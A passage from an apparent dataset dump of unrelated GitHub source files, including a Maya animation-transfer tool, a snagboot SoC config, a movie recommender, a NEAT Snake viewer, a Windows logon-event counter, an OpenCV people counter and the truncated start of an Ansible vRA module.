text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.button(label=u\"传递动画!\", c=lambda *args: self.transfer_anim())\n pm.setParent(\"..\")\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (layout, 'top', 10),\n (layout, 'left', 10),\n (layout, 'right', 10),\n (layout, 'bottom', 10),\n # (btn, 'left', 10),\n # (btn, 'right', 10),\n\n # (output_frame, 'left', 10),\n # (output_frame, 'right', 10),\n # (output_frame, 'bottom', 10),\n ],\n attachControl=[\n # (btn, 'top', 5, layout),\n # (output_frame, 'top', 5, btn),\n # (file_export_list_frame, 'bottom', 5, export_options_frame),\n # (export_options_frame, 'bottom', 5, execute_button),\n ])\n\n pm.showWindow(\"transferAnimTool\")\n\n def close_main_window(self):\n pm.optionVar(sv=('transferAnimToolTemplatePath', self.template_path))\n pm.optionVar(sv=('transferAnimToolNamespace', self.namespace))\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferAnimToolTemplatePath'):\n self.template_path = pm.optionVar(\n q='transferAnimToolTemplatePath')\n\n if pm.optionVar(q='transferAnimToolNamespace'):\n self.namespace = pm.optionVar(\n q='transferAnimToolNamespace')\n\n def load_template_file(self):\n json_location = pm.fileDialog2(\n dialogStyle=2, fileMode=1, okc=u\"选择模板配置文件\")\n if json_location:\n pm.textFieldButtonGrp(\n 'templateTextField', e=True, text=json_location[0])\n self.template_path = json_location[0]\n return\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\n \"namespaceTextField\", q=True, text=True)\n\n def transfer_anim(self):\n dict_data = common.read_json(file_path=self.template_path)\n print(dict_data)\n # print self.namespace\n source_attrs = dict_data.keys()\n print(source_attrs)\n for source_attr in source_attrs:\n source_anim_curves = pm.PyNode(\n \"%s%s\" % (self.namespace, source_attr)).inputs()\n if len(source_anim_curves) > 0:\n target_anim_curve = source_anim_curves[0].controller_name()\n # print target_anim_curve\n # print source_attr.split(\".\")[0]\n # print dict_data[source_attr].split(\".\")[0]\n target_anim_curve = target_anim_curve.replace(\n source_attr.split(\".\")[0],\n dict_data[source_attr].split(\".\")[0])\n\n new_anim_curve = pm.duplicate(\n source_anim_curves[0],\n name=target_anim_curve)\n\n pm.connectAttr(\n \"%s.output\" % new_anim_curve[0],\n \"%s%s\" % (self.namespace, dict_data[source_attr]),\n f=True)\n\n print(\"Done!\")\n\n return\n\n\nclass TemplateBuilder(common.Singleton):\n \"\"\"\n 属性传递模板创建工具\n\n 
传递属性工具依赖属性模板(JSON)文件,\n 这个模板文件里面包含数据来源(source)对象控制器的名字和属性,\n 接受数据的目标(target)对象控制器的名字和属性\n\n \"\"\"\n\n def __init__(self):\n super(TemplateBuilder, self).__init__()\n\n self.output_path = \"\"\n self.namespace = \"\"\n self.output_items = []\n\n self.initialize()\n self.show()\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferOutputPath'):\n self.output_path = pm.optionVar(\n q='transferOutputPath')\n\n if pm.optionVar(q='transferNamespace'):\n self.namespace = pm.optionVar(\n q='transferNamespace')\n\n def show(self):\n if pm.window(\"templateBuilder\", ex=True):\n pm.deleteUI(\"templateBuilder\")\n pm.window(\n \"templateBuilder\",\n title=u\"模板创建助手\", cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n mode_options_grp = self.mode_options_grp()\n\n layout = pm.rowColumnLayout(nc=2, w=520)\n self.source_attr_list_column()\n self.target_attr_list_column()\n pm.setParent(\"..\")\n\n btn = pm.button(\n label=u\"自动比对\", w=504,\n c=lambda *args: self.comparison_attrs())\n\n output_frame = self.template_item_list()\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (mode_options_grp, 'top', 10),\n (mode_options_grp, 'left', 10),\n (layout, 'left', 10),\n (btn, 'left', 10),\n (output_frame, 'left', 10),\n (output_frame, 'bottom', 10)],\n attachControl=[\n (layout, 'top', 5, mode_options_grp),\n (btn, 'top', 5, layout),\n (output_frame, 'top', 5, btn)])\n\n pm.showWindow(\"templateBuilder\")\n\n def template_item_list(self):\n frame_layout = pm.frameLayout(label=\"Output Frame\", mh=5, w=504)\n pm.textFieldGrp(\n \"namespaceField\",\n adj=2, label=\"Namespace:\",\n cw2=[80, 200],\n text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.textFieldButtonGrp(\n \"outputPathField\",\n label=\"Output Path:\",\n bl=\"Set Path\",\n adj=2,\n text=self.output_path,\n cw3=[80, 200, 100],\n bc=lambda *args: self.set_output_location())\n pm.textScrollList(\"outputItemScrollList\", a=self.output_items)\n pm.popupMenu()\n pm.menuItem(\n label=u\"载入数据\", c=lambda *args: self.load_dict_data())\n pm.menuItem(\n label=u\"移除选择\", c=lambda *args: self.remove_selected_item())\n pm.menuItem(\n label=u\"移除所有\", c=lambda *args: self.remove_all_item())\n pm.button(label=\"Build\", c=lambda *args: self.write_output())\n pm.setParent(\"..\")\n return frame_layout\n\n def mode_options_grp(self):\n options_grp = pm.optionMenuGrp(\n label=u'模式', cw2=[24, 200], adj=2)\n pm.menuItem(label=u'属性——属性')\n pm.menuItem(label=u'属性——对象')\n return options_grp\n\n def target_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Target Object:\",\n al=\"left\")\n pm.textField(\"targetObjectField\", w=250)\n pm.textScrollList(\n \"targetObjectAttrScrollList\",\n sc=lambda *args: self.print_selected_item(\n widget=\"targetObjectAttrScrollList\"),\n dcc=lambda *args: self.append_output_item())\n pm.button(\n \"loadTargetBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n widget=\"targetObjectField\",\n extra_widget=\"targetObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n def source_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Source Object:\",\n al=\"left\")\n pm.textField(\"sourceObjectField\", w=250)\n pm.textScrollList(\n \"sourceObjectAttrScrollList\",\n sc=lambda *args: self.print_selected_item(\n widget=\"sourceObjectAttrScrollList\"))\n pm.button(\n \"loadSourceBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n 
widget=\"sourceObjectField\",\n extra_widget=\"sourceObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n @staticmethod\n def remove_selected_item():\n selected_item = pm.textScrollList('outputItemScrollList', q=True,\n si=True)\n for item in selected_item:\n pm.textScrollList('outputItemScrollList', e=True, ri=item)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def remove_all_item():\n pm.textScrollList('outputItemScrollList', e=True, ra=True)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def load_controller(widget=None, extra_widget=None):\n controller = pm.ls(sl=True)\n if len(controller) > 1 or len(controller) < 1:\n pm.error(u\"请选择单个控制器\")\n else:\n pm.textField(widget, e=True, text=controller[0])\n\n attr_list = pm.listAttr(controller[0], k=True)\n pm.textScrollList(extra_widget, e=True, ra=True)\n pm.textScrollList(extra_widget, e=True, a=attr_list)\n\n @staticmethod\n def append_output_item():\n # todo: bug fix - 属性应该是一对一,当前是一对多,后续版本应该强制验证\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n key = \"%s.%s\" % (\n source_controller,\n pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n value = \"%s.%s\" % (\n target_controller,\n pm.textScrollList(\n \"targetObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n item = \"%s:%s\" % (key, value)\n print(item)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n\n print(\"--------------\")\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n def set_output_location(self):\n output_path = pm.fileDialog2(\n dialogStyle=2,\n fileFilter=\"JSON File (*.json);;\",\n fileMode=0, okc=u\"保存文件\")\n if output_path:\n pm.textFieldButtonGrp(\n \"outputPathField\", e=True,\n text=output_path[0])\n self.output_path = output_path[0]\n return\n\n def close_main_window(self):\n pm.optionVar(sv=('transferOutputPath', self.output_path))\n pm.optionVar(sv=('transferNamespace', self.namespace))\n\n def write_output(self):\n output_map = {}\n\n output_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n for output_item in output_items:\n key, value = output_item.split(\":\")\n print(key, value)\n output_map[key] = value\n\n common.write_json(dict_data=output_map, file_path=self.output_path)\n\n print(\"Done!\")\n\n def load_dict_data(self):\n item_list = []\n if os.path.isfile(self.output_path):\n dict_data = common.read_json(file_path=self.output_path)\n for item_key in dict_data.keys():\n item_list.append(\"%s%s:%s%s\" % (\n self.namespace,\n item_key,\n self.namespace,\n dict_data[item_key]))\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item_list)\n\n @staticmethod\n def print_selected_item(widget=None):\n print(pm.textScrollList(widget, q=True, si=True))\n\n @staticmethod\n def comparison_attrs():\n source_attrs = pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, ai=True)\n target_attrs = pm.textScrollList(\n 
\"targetObjectAttrScrollList\", q=True, ai=True)\n\n comparison_attrs = list(\n set(source_attrs).intersection(set(target_attrs)))\n print(comparison_attrs)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n\n for attr in comparison_attrs:\n key = \"%s.%s\" % (source_controller, attr)\n value = \"%s.%s\" % (target_controller, attr)\n item = \"%s:%s\" % (key, value)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n","repo_name":"jzboylxj/XDLibs","sub_path":"animation/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":14613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"20281370678","text":"import yaml\nfrom snagrecover.utils import cli_error,parse_usb\nimport logging\nlogger = logging.getLogger(\"snagrecover\")\nimport os\n\ndefault_usb_ids = {\n\t# default ROM code USB IDs\n\t\"stm32mp1\": (0x0483,0xdf11),\n\t\"sama5\": (0x03eb,0x6124),\n\t\"sunxi\": (0x1f3a,0xefe8),\n\t\"am62x\": (0x0451,0x6165),\n\t\"imx\": {\n\t\t\"imx8qxp\": (0x1fc9,0x012f),\n\t\t\"imx8qm\": (0x1fc9,0x0129),\n\t\t\"imx8dxl\": (0x1fc9,0x0147),\n\t\t\"imx28\": (0x15a2,0x004f),\n\t\t\"imx815\": (0x1fc9,0x013e),\n\t\t\"imx865\": (\"SDPS\",0x1fc9),\n\t\t\"imx93\": (0x1fc9,0x014e),\n\t\t\"imx7d\": (0x15a2,0x0076),\n\t\t\"imx6q\": (0x15a2,0x0054),\n\t\t\"imx6d\": (0x15a2,0x0061),\n\t\t\"imx6sl\": (0x15a2,0x0063),\n\t\t\"imx6sx\": (0x15a2,0x0071),\n\t\t\"imx6ul\": (0x15a2,0x007d),\n\t\t\"imx6ull\": (0x15a2,0x0080),\n\t\t\"imx6sll\": (0x1fc9,0x0128),\n\t\t\"imx7ulp\": (0x1fc9,0x0126),\n\t\t\"imxrt106x\": (0x1fc9,0x0135),\n\t\t\"imx8mm\": (0x1fc9,0x0134),\n\t\t\"imx8mq\": (0x1fc9,0x012b),\n\t\t\"imx53\" : (0x15a2,0x004e),\n\t}\n}\n\nrecovery_config = {} # Global immutable config to be initialized with CLI args\n\ndef get_family(soc_model: str) -> str:\n with open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n socs = yaml.safe_load(file)\n family = {**socs[\"tested\"], **socs[\"untested\"]}[soc_model][\"family\"]\n return family\n\ndef check_soc_model(soc_model: str):\n\twith open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n\t\tsocs = yaml.safe_load(file)\n\tif soc_model not in {**socs[\"tested\"], **socs[\"untested\"]}:\n\t\tcli_error(f\"unsupported soc model {soc_model}, supported socs: \\n\" + yaml.dump(socs))\n\treturn None\n\ndef init_config(args: list):\n\t# this is the only time that config.recovery_config should be modified!\n\t# get soc model\n\tsoc_model = args.soc\n\tcheck_soc_model(soc_model)\n\trecovery_config.update({\"soc_model\": soc_model})\n\tsoc_family = get_family(soc_model)\n\trecovery_config.update({\"soc_family\": soc_family})\n\tif soc_family != \"am335x\":\n\t\tif args.rom_usb is None:\n\t\t\tif soc_family == \"imx\":\n\t\t\t\trecovery_config[\"rom_usb\"] = default_usb_ids[\"imx\"][soc_model]\n\t\t\telse:\n\t\t\t\trecovery_config[\"rom_usb\"] = default_usb_ids[soc_family]\n\t\telse:\n\t\t\trecovery_config[\"rom_usb\"] = parse_usb(args.rom_usb)\n\n\tfw_configs = {}\n\tif args.firmware:\n\t\tfor fw in args.firmware:\n\t\t\tif not isinstance(fw, dict):\n\t\t\t\tcli_error(\"firmware config to CLI did not evaluate to Python3 dict: {fw}\")\n\t\t\tfw_configs = {**fw_configs, **fw}\n\t\trecovery_config[\"firmware\"] = fw_configs\n\t\tif args.firmware_file:\n\t\t\tprint(\"Warning: You passed firmware configuration via files AND direct CLI arguments.\")\n\tif args.firmware_file:\n\t\t# get firmware configs\n\t\tfor path in args.firmware_file:\n\t\t\twith open(path, \"r\") as file:\n\t\t\t\tfw_configs = {**fw_configs, **yaml.safe_load(file)}\n\t\tif not isinstance(fw_configs, dict):\n\t\t\tcli_error(f\"firmware config passed to CLI did not evaluate to dict: {fw_configs}\")\n\t\trecovery_config[\"firmware\"] = fw_configs\n\n\t# store input arguments in config\n\trecovery_config[\"args\"] = vars(args)\n\tlogger.debug(f\"recovery_config:{str(recovery_config)}\")\n\n","repo_name":"bootlin/snagboot","sub_path":"src/snagrecover/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"16"}
+{"seq_id":"5054389047","text":"import luserver.scripts.general.flower as script\r\nfrom luserver.components.mission import TaskType\r\n\r\nclass ScriptComponent(script.ScriptComponent):\r\n\tdef on_skill_event(self, caster, event_name):\r\n\t\tif event_name == \"waterspray\":\r\n\t\t\tif \"blooming\" not in self.script_network_vars:\r\n\t\t\t\tself.object.physics.drop_loot(12317, caster)\r\n\t\t\t\tcaster.char.mission.update_mission_task(TaskType.Script, self.object.lot, mission_id=1136)\r\n\r\n\t\tsuper().on_skill_event(caster, event_name)\r\n","repo_name":"lcdr/luserver","sub_path":"luserver/scripts/crux_prime/aura_blossom_flower.py","file_name":"aura_blossom_flower.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"}
+{"seq_id":"40700159998","text":"from typing import List\n\n\nclass AverageOfSubarrayOfSizeK:\n # Time complexity: O(N * K)\n def findAveragesBruteForce(self, k: int, arr: List[int]) -> List[float]:\n result = []\n for i in range(len(arr) - k + 1):\n _sum = 0\n for j in range(i, i + k):\n _sum += arr[j]\n result.append(_sum / k)\n return result\n\n # Time complexity: O(N)\n def findAverages(self, k: int, arr: List[int]) -> List[float]:\n result = []\n _sum = 0\n for i in range(len(arr)):\n _sum += arr[i]\n if i >= k - 1:\n result.append(_sum / k)\n _sum -= arr[i - k + 1]\n\n return result\n\n\nif __name__ == \"__main__\":\n print(AverageOfSubarrayOfSizeK().findAverages(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n print(AverageOfSubarrayOfSizeK().findAveragesBruteForce(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n","repo_name":"DenysLins/code-interview","sub_path":"patterns-for-coding-interview/sliding-window/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1821189371","text":"import tkinter as tk\r\nimport sounddevice as sd\r\nimport wavio\r\nimport os\r\nfrom datetime import datetime\r\n\r\nclass VoiceRecorderApp:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Voice Recorder App\")\r\n\r\n self.is_recording = False\r\n self.recording_filename = None\r\n\r\n # UI components\r\n self.record_button = tk.Button(root, text=\"Record\", command=self.toggle_recording)\r\n self.record_button.pack(pady=10)\r\n\r\n self.save_button = tk.Button(root, text=\"Save Recording\", command=self.save_recording, state=tk.DISABLED)\r\n self.save_button.pack(pady=5)\r\n\r\n # Start the GUI event loop\r\n root.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n root.mainloop()\r\n\r\n def toggle_recording(self):\r\n if not self.is_recording:\r\n self.start_recording()\r\n else:\r\n self.stop_recording()\r\n\r\n def start_recording(self):\r\n self.is_recording = True\r\n self.record_button.config(text=\"Stop Recording\")\r\n self.save_button.config(state=tk.DISABLED)\r\n\r\n # Set up audio recording\r\n self.recording_filename = f\"/Users\\logan\\Desktop{datetime.now().strftime('%Y%m%d_%H%M%S')}.wav\"\r\n self.stream = sd.InputStream(callback=self.audio_callback)\r\n self.stream.start()\r\n\r\n def stop_recording(self):\r\n self.is_recording = False\r\n self.record_button.config(text=\"Record\")\r\n self.save_button.config(state=tk.NORMAL)\r\n\r\n # Stop audio recording\r\n self.stream.stop()\r\n self.stream.close()\r\n\r\n def audio_callback(self, indata, frames, time, status):\r\n if status:\r\n print(status)\r\n wavio.write(self.recording_filename, indata, 44100, sampwidth=3)\r\n\r\n def save_recording(self):\r\n save_path = tk.filedialog.asksaveasfilename(defaultextension=\".wav\", filetypes=[(\"WAV files\", \"*.wav\")])\r\n if save_path:\r\n os.rename(self.recording_filename, save_path)\r\n tk.messagebox.showinfo(\"Save Recording\", \"Recording saved successfully!\")\r\n\r\n def on_closing(self):\r\n if self.is_recording:\r\n self.stop_recording()\r\n self.root.destroy()\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = VoiceRecorderApp(root)\r\n","repo_name":"Mxlzz31/CVIP","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11811999918","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import pairwise\nfrom scipy.sparse import csr_matrix\nimport sklearn\nimport pickle\nfrom utils import make_user_vector\n\nimport os\n#%%\n# movie given by the user\nquery = {\n # movieId, rating\n 4470:5,\n 48:5,\n 594:5,\n 27619:5,\n 152081:5,\n 595:5,\n 616:5,\n 1029:5\n}\n\n#%%\nratings = pd.read_csv('data/ratings.csv')\nmovies = pd.read_csv('data/movies.csv')\n#%%\nmovies.set_index('movieId').loc[query.keys()]\n#%%\nratings_per_movie = ratings.groupby('movieId')['rating'].count()\npopular_movies = ratings_per_movie[ratings_per_movie>30]\nratings = ratings.loc[ratings['movieId'].isin(popular_movies.index)]\nR = csr_matrix((ratings['rating'], (ratings['userId'], ratings['movieId'])))\n#%%Training\nsorted(sklearn.neighbors.VALID_METRICS_SPARSE['brute'])\n#%%\nmodel_nn = NearestNeighbors(metric='cosine')\nmodel_nn.fit(R)\n\n#%%Save the trained model\nwith open('./nn_recommender.pkl', 'wb') as file:\n pickle.dump(model_nn, file)\n\n#%%read the model from hard drive\nwith open('./nn_recommender.pkl', 'rb') as file:\n model_nn = pickle.load(file)\n\n#%%\nshape = model_nn.n_features_in_\nuser_vec = make_user_vector(query, shape)\n\n#%%calculate the score\ndistances, userIds = model_nn.kneighbors(user_vec, n_neighbors=10, return_distance=True)\ndistances = distances[0]\nuserIds = userIds[0]\n\n#%% extract the ratings of the similar users from the original data\nneighborhood = ratings.set_index('userId').loc[userIds]\n\n#%%score calculation\nscores = neighborhood.groupby('movieId')['rating'].mean()\n\n#%% give recommendations\nscores.loc[scores.index.isin(query.keys())] = 0\nscores.sort_values(ascending=False, inplace=True)\n#%%\nscores_10 = scores.head(10)\nrecommendations = movies.set_index('movieId').loc[scores_10.index]","repo_name":"damoon15/movie_recommander","sub_path":"model_train_neighborhood_recommender.py","file_name":"model_train_neighborhood_recommender.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42937621482","text":"\"\"\"\nCode to watch the best bot play Snake\n\"\"\"\nimport pickle\nimport game, bot\nimport neat\nimport numpy as np\n\ndef preset_food_pos_maker(positions):\n \"\"\"\n Returns a function that returns the next position in :positions: each time it's called\n :param positions: list of tuples\n :return: function with no args\n \"\"\"\n pos = positions\n def preset_food_pos():\n try:\n return pos.pop(0)\n except Exception:\n print('out of given positions; using random ones')\n return game.rand_pos()\n return preset_food_pos\n\ndef watch_best(genome_file, config_file, food_pos_file):\n \"\"\"\n Watch a particularly good game of Snake\n \"\"\"\n # Import best game data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n food_positions = pickle.load(open(food_pos_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n ## Play game\n # Must be true to observe game being played\n game.WATCH = True\n game.USE_FRAMERATE = True\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = preset_food_pos_maker(food_positions)\n\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\n\ndef watch_games(genome_file, config_file):\n \"\"\"\n Loads the given genome from file and plays Snake repeatedly, using that genome to control the bot\n :param genome_file: name of genome file\n \"\"\"\n # Import best genome data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n # Must be true to observe game being played\n # game.WATCH = True\n # game.USE_FRAMERATE = True\n\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = game.rand_pos\n\n while True:\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\ngame.FRAMERATE = 30\nwatch_best('best_genome.pkl', 'best_config.pkl', 'best_food_pos.pkl')\nwatch_games('best_genome.pkl', 'best_config.pkl')","repo_name":"nglaze00/Snake-reinforcement-learning","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"7567085767","text":"from multiprocessing import Process, Manager\nimport Evtx.Evtx as evtx\nfrom bs4 import BeautifulSoup\n\npath = \"C:\\Windows\\System32\\winevt\\Logs\\Security.evtx\"\nEventCount = 0\nAllEvent = 0\nwith evtx.Evtx(path) as log:\n for x in log.records():\n AllEvent +=1\n\ndef CountTotal(d,MinNum,MaxNum):\n global EventCount\n print(MinNum,MaxNum)\n try:\n with evtx.Evtx(path) as log:\n for y in range(MinNum, MaxNum):\n print(\"Numbering : \",y)\n GetOne = log.get_record(1)\n print(GetOne)\n # GetOne = log.get_record(int(y))\n # soup = BeautifulSoup(GetOne.xml(), \"html.parser\")\n # System_ = soup.find(\"system\")\n # EventId = int(System_.find(\"eventid\").text)\n # if EventId == 4624:\n # EventCount += 1\n # print(\"EvsentCount\", EventCount)\n # d[0] += EventCount\n except Exception as e:\n print(e)\n\nif __name__ == '__main__':\n with Manager() as manager:\n d = manager.list([0 for i in range(5)])\n print(AllEvent)\n\n p1 = Process(target=CountTotal, args=(d,1,13325))\n # p2 = Process(target=CountTotal, args=(d,13325,AllEvent-13325))\n p1.start()\n # p2.start()\n\n p1.join()\n # p2.join()\n\n print(d)\n\n","repo_name":"jak010/study-python-src","sub_path":"etc/ExampleGroup/MultiProcessing/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17373806353","text":"import numpy as np\r\nimport cv2\r\nimport pandas,time\r\nfrom datetime import datetime\r\nfirst_frame=None\r\nstatus_list=[None,None]\r\ntimes=[]\r\ndf=pandas.DataFrame(columns=[\"Start\",\"End\"])\r\nvid = cv2.VideoCapture(0)\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\nwhile True:\r\n check, frame = vid.read()\r\n status=0\r\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n gray=cv2.GaussianBlur(gray,(21,21),0)\r\n\r\n if first_frame is None:\r\n first_frame=gray\r\n continue\r\n\r\n delta_frame=cv2.absdiff(first_frame,gray)\r\n thresh_frame=cv2.threshold(delta_frame, 30, 255, cv2.THRESH_BINARY)[1]\r\n thresh_frame=cv2.dilate(thresh_frame, None, iterations=2)\r\n\r\n (_,cnts,_)=cv2.findContours(thresh_frame.copy(),cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n for contour in cnts:\r\n if cv2.contourArea(contour) < 10000:\r\n continue\r\n status=1\r\n\r\n (x, y, w, h)=cv2.boundingRect(contour)\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0,255,0), 3)\r\n status_list.append(status)\r\n\r\n status_list=status_list[-2:]\r\n\r\n\r\n if status_list[-1]==1 and status_list[-2]==0:\r\n times.append(datetime.now())\r\n if status_list[-1]==0 and status_list[-2]==1:\r\n times.append(datetime.now())\r\n\r\n\r\n\r\n cv2.imshow(\"Gray Frame\",gray)\r\n cv2.imshow(\"Delta Frame\",delta_frame)\r\n cv2.imshow(\"Threshold Frame\",thresh_frame)\r\n cv2.imshow(\"Color Frame\",frame)\r\n\r\n faces = face_cascade.detectMultiScale(gray)\r\n print(faces)\r\n if len(faces) == 0:\r\n print (\"No faces found\")\r\n\r\n else:\r\n print(faces)\r\n print(faces.shape)\r\n print (\"Number of faces detected: \" + str(faces.shape[0]))\r\n\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(image,(x,y),(x+w,y+h),(0,255,0),1)\r\n\r\n cv2.rectangle(image, ((0,image.shape[0] -25)),(800, image.shape[0]), (255,255,255), -1)\r\n cv2.putText(image, \"Number of faces detected: \" + str(faces.shape[0]), (0,image.shape[0] -10), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0,0,0), 1)\r\n\r\n cv2.imshow('Image with faces',image)\r\n cv2.waitKey(0)\r\n\r\n key=cv2.waitKey(1)\r\n\r\n if key==ord('q'):\r\n if status==1:\r\n times.append(datetime.now())\r\n break\r\n\r\n\r\n\r\nprint(status_list)\r\nprint(times)\r\nfor i in range(0,len(times),2):\r\n df=df.append({\"Start\":times[i],\"End\":times[i+1]},ignore_index=True)\r\n\r\ndf.to_csv(\"Times.csv\")\r\n\r\nvideo.release()\r\ncv2.destroyAllWindows\r\n","repo_name":"divyadharshinichinnan/crowd-management-","sub_path":"count/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9510551494","text":" #!/usr/bin/python\n\nSOCKET_TIMEOUT = 30\nDEFAULT_TENANT = 'vsphere.local'\nDEFAULT_MEMORY = 512\nDEFAULT_CPUS = 1\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: vravm\nshort_description: A module that wraps the vRA 7 REST calls.\nversion_added: \"2.4\"\ndescription:\n - This module provides a wrapper for making vRA API REST calls to a specific\n vRA instance.\noptions:\n host:\n description:\n - This is vRA host name.\n required: true\n rest_method:\n description:\n - The name of the REST method to call on the host.\n required: true\n username:\n description:\n - The user name to use when logging into the vRA instance to\n retrieve a bearer token.\n required: false\n password:\n description:\n - The password for the user logging into the vRA instance to\n retrieve a bearer token.\n required: false\n vm_template:\n description:\n - The JSON blueprint template object that acts as the configuration\n for the VM to be provisioned.\n required: false\n tenant:\n description:\n - The tenant for the user making the REST call. This will default\n to \"vsphere.local\".\n required: false\n token:\n description:\n - The bearer token to use with all calls other than the one to\n retrieve the bearer token.\n required: false\n catalog_item_id:\n description:\n - The ID of the catalog item that is to be the target of the method\n execution.\n required: false\nauthor:\n - Todd Blackwell (@vmware.com)\n'''\n\nEXAMPLES = '''\n# Retrieve a bearer token\n- name: Get a Bearer Token\n vra7rest:\n host: vra-01a.corp.local\n rest_method: get_bearer_token\n username: jason\n password: VMware1!\n tenant: vsphere.local\n'''\n\nRETURN = '''\noriginal_message:\n description: The original name param that was passed in\n type: str\nmessage:\n description: The output message that the sample module generates\n'''\n\nimport json\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.urls import fetch_url, url_argument_spec\n\ndef set_json_value(json, path_list, new_value):\n\n if len(path_list) > 1:\n outer_most_path_element = path_list.pop(0)\n sub_json_object = json[outer_most_path_element]\n set_json_value(sub_json_object, path_list, new_value)\n else:\n json[path_list[0]] = new_value\n\ndef main():\n # Define the parameters that a user can pass into this module.\n 